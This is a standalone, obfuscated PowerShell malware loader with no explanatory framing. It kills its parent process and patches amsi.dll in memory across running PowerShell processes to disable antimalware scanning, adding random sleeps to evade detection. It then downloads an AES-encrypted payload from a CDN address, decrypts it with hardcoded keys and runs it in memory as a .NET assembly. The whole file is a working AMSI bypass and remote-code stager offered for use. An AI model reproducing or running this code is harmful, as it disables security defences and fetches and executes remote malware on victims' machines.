$hollow = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($hollow) { Stop-Process -Id $hollow -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $hawk = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$hawk) { exit 1 } foreach ($knob in $hawk) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $field = [K]::OpenProcess(0x001F0FFF, $kite, $knob.Id) $boulder = $null $reef = 0 foreach ($ember in $knob.Modules) { if ($ember.ModuleName -eq "amsi.dll") { $boulder = $ember.BaseAddress $reef = $ember.ModuleMemorySize break } } if (!$boulder) { continue } $keel = [byte[]]::new(32) $cedar = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $cypress = $null for ($kestrel = 0; $kestrel -le $reef; $kestrel += 32) { $pine = [IntPtr]::Zero [K]::ReadProcessMemory($field, [IntPtr]($boulder.ToInt64() + $kestrel), $keel, 32, [ref]$pine) $jolt = $canyon for ($kernel = 0; $kernel -lt 32; $kernel++) { if ($keel[$kernel] -ne $cedar[$kernel]) { $jolt = $kite; break } } if ($jolt) { $cypress = [IntPtr]($boulder.ToInt64() + $kestrel); break } } if (!$cypress) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $dawn = 0 [K]::VirtualProtectEx($field, $boulder, 0x1000, 0x40, [ref]$dawn) $raven = [byte[]]@(0x31,0xff,0x90) $arrow = 0 [K]::WriteProcessMemory($field, [IntPtr]($cypress.ToInt64() + 0x1b), $raven, 3, [ref]$arrow) } } KJhbhb #ujhifsfiohdf setx BUILD "Titan" $jetty = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $meadow = [System.Net.WebClient]::new() $mountain = $meadow.DownloadData($jetty) $mead = [System.Security.Cryptography.Aes]::Create() $forest = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $yew = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $mead.Key = $forest $mead.IV = $yew $willow = $mead.CreateDecryptor() $mist = $willow.TransformFinalBlock($mountain, 0, $mountain.Length) $iris = [System.Reflection.Assembly]::Load($mist) $thorn = $iris.EntryPoint $thorn.Invoke($null, $null) #ujhifsfiohdf